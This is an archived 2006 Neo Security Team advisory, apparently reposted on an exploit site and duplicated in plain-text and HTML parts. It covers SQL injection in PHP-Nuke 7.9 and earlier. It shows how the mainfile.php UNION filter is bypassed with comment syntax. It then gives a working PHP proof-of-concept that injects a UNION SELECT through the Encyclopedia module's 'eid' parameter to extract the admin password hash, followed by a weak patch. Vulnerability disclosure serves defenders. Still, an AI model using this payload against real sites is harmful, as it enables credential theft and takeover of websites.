Home / exploits PHPNuke-7.9.txt
Posted on 25 October 2006
------=_Part_215822_13092688.1161562994664 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline /* -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST] - Advisory 27 - 2006-10-22 -------------------------------------------------------- Program: PHP Nuke Homepage: http://www.php.net Vulnerable Versions: PHP Nuke <= 7.9 Risk: High! Impact: Critical Risk -==PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities==- --------------------------------------------------------- - Description --------------------------------------------------------- PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases. - Tested --------------------------------------------------------- localhost & many sites - Vulnerability Description --------------------------------------------------------- The most important and critical vulnerability is in the code designed to filter the POST inputs to protect the script against SQL Injections. ==[ mainfile.php 143-146 ]========================== [...] if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) { header("Location: index.php"); die(); } [...] ==[ end mainfile.php ]============================== The protection is very good... but we can bypass it by using something like '/**/UNION ' or ' UNION/**/' ;) Also i found a SQL Injection vulnerability in the Encyclopedia module. The "eid" variable isn't filtered at any moment, so if we bypass the sql injection protection we can execute arbitrary sql commands. With a simple UNION statement we get the md5 hash of the admin password. Here is the real life Proof of Concept exploit. ==Real Proof of Concept exploit== <? /* Neo Security Team - Exploit made by Paisterist on 2006-10-22 http://www.neosecurityteam.net */ $host="localhost"; $path="/phpnuke/"; $prefix="nuke_"; $port="80"; $fp = fsockopen($host, $port, $errno, $errstr, 30); $data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM $prefix_authors WHERE '1'='1"; if ($fp) { $p="POST /phpnuke/modules.php?name=Encyclopedia&file=search HTTP/1.0 "; $p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* "; $p.="Referer: http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search "; $p.="Accept-Language: es-ar "; $p.="Content-Type: application/x-www-form-urlencoded "; $p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1 ) "; $p.="Host: localhost "; $p.="Content-Length: ".strlen($data)." "; $p.="Pragma: no-cache "; $p.="Connection: keep-alive "; $p.=$data; fwrite($fp, $p); while (!feof($fp)) { $content .= fread($fp, 4096); } preg_match("/([a-zA-Z0-9]{32})/", $content, $matches); print_r($matches); } ?> ==Real Proof of Concept exploit== Whit this PoC code i get the md5 hash of the first admin (God) of the nuke_authors table. - How to fix it? More information? -------------------------------------------------------- You can found a patch on http://www.neosecurityteam.net/foro/ Also, you can modify the line 143 of mainfile.php, adding one more protection like: ==[ mainfile.php old line (143) ]========================== [...] if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) { } [...] ==[ end mainfile.php ]===================================== ==[ mainfile.php new line (143) ]========================== [...] if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+') OR stripos_clone($postString_64, '*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) { } [...] ==[ end mainfile.php ]===================================== That's a momentary solution to the problem. I recommend to download the PHP Nuke 8.0 version in the next days... it is not free at the moment. - References -------------------------------------------------------- http://www.neosecurityteam.net/index.php?action=advisories&id=27 - Credits -------------------------------------------------------- Anti SQL Injection protection bypass by Paisterist -> paisterist.nst [at] gmail [dot] com SQL Injection vulnerability in Encyclopedia module discovered by Paisterist -> paisterist.nst [at] gmail [dot] com Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com [N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/ - Greets -------------------------------------------------------- HaCkZaTaN K4P0 Daemon21 Link 0m3gA_x LINUX nitrous m0rpheus nikyt0x KingMetal Knightmare Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!! @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@ @@@'''''@@@ '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ /* EOF */ -- Paisterist Neo Security Team http://neosecurityteam.net ------=_Part_215822_13092688.1161562994664 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline /*<br>--------------------------------------------------------<br>[N]eo [S]ecurity [T]eam [NST] - Advisory 27 - 2006-10-22<br>--------------------------------------------------------<br>Program: PHP Nuke<br>Homepage: <a href="http://www.php.net"> http://www.php.net</a><br>Vulnerable Versions: PHP Nuke <= 7.9<br>Risk: High!<br>Impact: Critical Risk<br><br>-==PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities==-<br>--------------------------------------------------------- <br><br>- Description<br>---------------------------------------------------------<br>PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases. <br><br>- Tested<br>---------------------------------------------------------<br>localhost & many sites<br><br>- Vulnerability Description<br>---------------------------------------------------------<br><br>The most important and critical vulnerability is in the code designed to filter the POST inputs to protect the script against <br> SQL Injections.<br><br><br>==[ mainfile.php 143-146 ]==========================<br>[...]<br>if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) { <br>header("Location: index.php");<br>die();<br>}<br>[...]<br>==[ end mainfile.php ]==============================<br><br>The protection is very good... but we can bypass it by using something like '/**/UNION ' or ' UNION/**/' ;) <br><br>Also i found a SQL Injection vulnerability in the Encyclopedia module. The "eid" variable isn't filtered at any moment, so if<br> we bypass the sql injection protection we can execute arbitrary sql commands. With a simple UNION statement we get the <br>md5 hash of the admin password.<br><br>Here is the real life Proof of Concept exploit.<br><br>==Real Proof of Concept exploit==<br><?<br>/*<br><br>Neo Security Team - Exploit made by Paisterist on 2006-10-22<br><a href="http://www.neosecurityteam.net"> http://www.neosecurityteam.net</a><br><br>*/<br><br>$host="localhost";<br>$path="/phpnuke/";<br>$prefix="nuke_";<br>$port="80";<br>$fp = fsockopen($host, $port, $errno, $errstr, 30); <br>$data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM $prefix_authors WHERE '1'='1";<br><br>if ($fp) {<br> $p="POST /phpnuke/modules.php?name=Encyclopedia&file=search HTTP/1.0 "; <br> $p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */* ";<br> $p.="Referer: <a href="http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search ">http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search </a>";<br> $p.="Accept-Language: es-ar "; <br> $p.="Content-Type: application/x-www-form-urlencoded ";<br> $p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) ";<br> $p.="Host: localhost ";<br> $p.="Content-Length: ".strlen($data)." "; <br> $p.="Pragma: no-cache ";<br> $p.="Connection: keep-alive ";<br> $p.=$data;<br> <br> fwrite($fp, $p);<br> <br> while (!feof($fp)) {<br> $content .= fread($fp, 4096); <br> }<br><br> preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);<br><br> print_r($matches);<br>}<br>?><br>==Real Proof of Concept exploit==<br><br>Whit this PoC code i get the md5 hash of the first admin (God) of the nuke_authors table. <br><br>- How to fix it? More information?<br>--------------------------------------------------------<br><br>You can found a patch on <a href="http://www.neosecurityteam.net/foro/">http://www.neosecurityteam.net/foro/</a> <br><br>Also, you can modify the line 143 of mainfile.php, adding one more protection like:<br><br>==[ mainfile.php old line (143) ]==========================<br>[...]<br>if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) { <br>}<br>[...]<br>==[ end mainfile.php ]=====================================<br><br>==[ mainfile.php new line (143) ]==========================<br>[...]<br>if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+') OR stripos_clone($postString_64, <br>'*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) {<br>}<br>[...]<br>==[ end mainfile.php ]=====================================<br><br>That's a momentary solution to the problem. I recommend to download the PHP Nuke 8.0 version in the next days... it is not <br>free at the moment.<br><br>- References<br>--------------------------------------------------------<br><a href="http://www.neosecurityteam.net/index.php?action=advisories&id=27"> http://www.neosecurityteam.net/index.php?action=advisories&id=27</a><br><br>- Credits<br>--------------------------------------------------------<br>Anti SQL Injection protection bypass by Paisterist -> paisterist.nst [at] gmail [dot] com<br>SQL Injection vulnerability in Encyclopedia module discovered by Paisterist -> paisterist.nst [at] gmail [dot] com<br>Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com <br><br>[N]eo [S]ecurity [T]eam [NST] - <a href="http://www.neosecurityteam.net/">http://www.neosecurityteam.net/</a><br><br><br>- Greets<br>--------------------------------------------------------<br>HaCkZaTaN<br>K4P0<br> Daemon21<br>Link<br>0m3gA_x<br>LINUX<br>nitrous<br>m0rpheus<br>nikyt0x<br>KingMetal<br>Knightmare<br><br>Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!<br><br>@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@<br>'@@@@@''@@'@@@''''''''@@''@@@''@@ <br>'@@'@@@@@@''@@@@@@ @@@'''''@@@<br>'@@'''@@@@'''''''''@@@''''@@@<br>@@@@''''@@'@@@@@@@@@@''''@@@@@<br><br>/* EOF */<br><br clear="all"><br>-- <br>Paisterist<br><br>Neo Security Team <a href="http://neosecurityteam.net"> http://neosecurityteam.net</a> ------=_Part_215822_13092688.1161562994664--
